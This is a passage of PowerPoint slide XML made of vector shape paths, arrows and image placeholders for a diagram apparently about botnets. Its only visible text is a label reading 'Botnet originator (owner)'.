                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173813" y="55664"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186054" h="279400">
                    <a:moveTo>
                      <a:pt x="174184" y="56438"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="104648" y="56438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109854" y="59347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113537" y="62230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115824" y="65100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117983" y="67957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120523" y="73075"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123316" y="80454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179070" y="71247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175619" y="59440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174184" y="56438"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FDA400"/>
              </a:solidFill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bject 27"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId29"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3163951" y="5635625"/>
                <a:ext cx="186055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86054" h="279400">
                    <a:moveTo>
                      <a:pt x="104648" y="159207"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="104648" y="171713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="184219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="196726"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="209232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113157" y="207251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119379" y="204000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123316" y="199466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127253" y="194919"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="189839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="184213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129159" y="179311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127508" y="174802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124206" y="170675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120903" y="166560"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114300" y="162737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="159207"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186054" h="279400">
                    <a:moveTo>
                      <a:pt x="82804" y="55664"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="76326" y="57861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71881" y="60566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69468" y="63804"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66929" y="67043"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="70853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="75247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65659" y="79844"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="95758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="85730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="75706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="65684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="55664"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="186054" h="279400">
                    <a:moveTo>
                      <a:pt x="82804" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="90043" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97409" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="5143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="10287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="15430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120433" y="17285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155956" y="31965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179070" y="71247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165161" y="73550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151241" y="75850"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137296" y="78151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123316" y="80454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120523" y="73075"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117983" y="67957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115824" y="65100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113537" y="62230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109854" y="59347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="56438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="67716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="78993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="90271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="101549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125529" y="107954"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165481" y="128231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184411" y="162255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185674" y="176136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185221" y="184458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170164" y="220367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135762" y="244856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="249936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="257300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="264668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="272035"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104648" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97409" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90043" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="279400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="272035"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="264668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="257300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="249936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72278" y="248709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34226" y="236110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8000" y="207137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="180543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15071" y="178714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30178" y="176884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45309" y="175051"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60451" y="173215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62230" y="183515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64643" y="190944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67691" y="195516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70738" y="200088"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75818" y="204139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="207683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="193909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="180136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="166363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="152590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68756" y="148364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28035" y="129119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9209" y="92282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8636" y="82524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9802" y="69208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37762" y="27821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="15430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="10287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="5143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82804" y="0"/>
                    </a:lnTo>
                    <a:close/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object 28"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId30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515100" y="3652837"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="object 29"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId31"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6610350" y="2606294"/>
                <a:ext cx="1335405" cy="241935"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1335404" h="241935">
                    <a:moveTo>
                      <a:pt x="868426" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="609600" y="73025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217043" y="31622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="92963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392556" y="134238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135127" y="206882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466217" y="241807"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723646" y="169163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1118234" y="210819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335277" y="149478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940689" y="107950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1199515" y="34925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="868426" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FDA400"/>
              </a:solidFill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bject 30"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId32"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6610350" y="2606294"/>
                <a:ext cx="1335405" cy="241935"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1335404" h="241935">
                    <a:moveTo>
                      <a:pt x="868426" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="915724" y="5000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="963022" y="9989"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1010321" y="14972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1057619" y="19952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1104918" y="24935"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1152216" y="29924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1199515" y="34925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1147713" y="49542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095935" y="64141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1044176" y="78733"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="992429" y="93332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940689" y="107950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990028" y="113141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1039366" y="118332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1088700" y="123523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1138031" y="128714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1187355" y="133905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236672" y="139096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1285980" y="144287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335277" y="149478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281058" y="164814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226804" y="180149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1172525" y="195484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1118234" y="210819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068900" y="205586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1019575" y="200364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970256" y="195150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="920940" y="189944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871624" y="184744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822305" y="179548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772980" y="174355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723646" y="169163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672148" y="183704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620668" y="198227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569194" y="212744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517714" y="227267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466217" y="241807"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418918" y="236807"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371620" y="231818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324321" y="226835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277023" y="221855"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229724" y="216872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182426" y="211883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135127" y="206882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186625" y="192390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238105" y="177874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289579" y="163339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341059" y="148792"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392556" y="134238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343497" y="129090"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294429" y="123932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245355" y="118768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196278" y="113601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147201" y="108434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98127" y="103270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49059" y="98112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="92963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54272" y="77628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108521" y="62293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162770" y="46958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217043" y="31622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266138" y="36813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315223" y="42003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364300" y="47189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413369" y="52371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462432" y="57547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511490" y="62716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560546" y="67875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609600" y="73025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661353" y="58456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713124" y="43863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764901" y="29252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816672" y="14629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="868426" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="909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bject 31"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId33"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6643751" y="2727325"/>
                <a:ext cx="1268730" cy="919480"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1268729" h="919479">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="919226"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1268729" h="919479">
                    <a:moveTo>
                      <a:pt x="704850" y="69850"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="704850" y="706501"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1268729" h="919479">
                    <a:moveTo>
                      <a:pt x="1268349" y="69850"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1268349" y="919226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bject 32"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId34"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5087873" y="1981708"/>
                <a:ext cx="1532255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1532254" h="85089">
                    <a:moveTo>
                      <a:pt x="1455716" y="59357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1455547" y="84708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506946" y="59436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468374" y="59436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1455716" y="59357"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1532254" h="85089">
                    <a:moveTo>
                      <a:pt x="76453" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="37591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76073" y="76200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76200" y="50752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63500" y="50672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63626" y="25272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76327" y="25272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76453" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1532254" h="85089">
                    <a:moveTo>
                      <a:pt x="1455885" y="33956"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1455716" y="59357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468374" y="59436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468627" y="34036"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1455885" y="33956"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1532254" h="85089">
                    <a:moveTo>
                      <a:pt x="1456054" y="8508"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1455885" y="33956"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468627" y="34036"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468374" y="59436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506946" y="59436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1532001" y="47116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1456054" y="8508"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1532254" h="85089">
                    <a:moveTo>
                      <a:pt x="76327" y="25352"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="76200" y="50752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1455716" y="59357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1455885" y="33956"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76327" y="25352"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1532254" h="85089">
                    <a:moveTo>
                      <a:pt x="63626" y="25272"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="63500" y="50672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76200" y="50752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76327" y="25352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63626" y="25272"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1532254" h="85089">
                    <a:moveTo>
                      <a:pt x="76327" y="25272"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="63626" y="25272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76327" y="2535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object 33"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId35"/>
                </p:custDataLst>
              </p:nvPr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1075" y="1590611"/>
                <a:ext cx="1028700" cy="1074667"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId36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332" y="5580"/>
              <a:ext cx="660" cy="696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="object 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="8363" y="5580"/>
              <a:ext cx="695" cy="3021"/>
              <a:chOff x="3670300" y="3667061"/>
              <a:chExt cx="422909" cy="1838960"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="39" name="object 36"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId37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70300" y="3667061"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="40" name="object 37"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId38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91000" y="4373562"/>
                <a:ext cx="401637" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="object 38"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId39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91000" y="5079999"/>
                <a:ext cx="401637" cy="425450"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="object 39"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId40"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3881500" y="4090923"/>
                <a:ext cx="0" cy="989330"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path h="989329">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="282575"/>
                    </a:lnTo>
                  </a:path>
                  <a:path h="989329">
                    <a:moveTo>
                      <a:pt x="0" y="706501"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="989076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object 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="9404" y="7322"/>
              <a:ext cx="662" cy="1046"/>
              <a:chOff x="4303776" y="4727511"/>
              <a:chExt cx="403225" cy="636905"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="44" name="object 41"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId41"/>
                </p:custDataLst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303776" y="4727511"/>
                <a:ext cx="403225" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="object 42"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId42"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4516501" y="5151373"/>
                <a:ext cx="0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h="213360">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="212851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object 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId43"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004" y="6925"/>
              <a:ext cx="2701" cy="161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p>
              <a:pPr marL="12700" marR="5080" algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="95"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200" b="1" spc="-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Botnet originator (owner)</a:t>
              </a:r>
              <a:endParaRPr sz="22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object 44"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId44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13621" y="2344"/>
              <a:ext cx="1067" cy="1127"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="object 45"/>
            <p:cNvSpPr txBox="1"/>
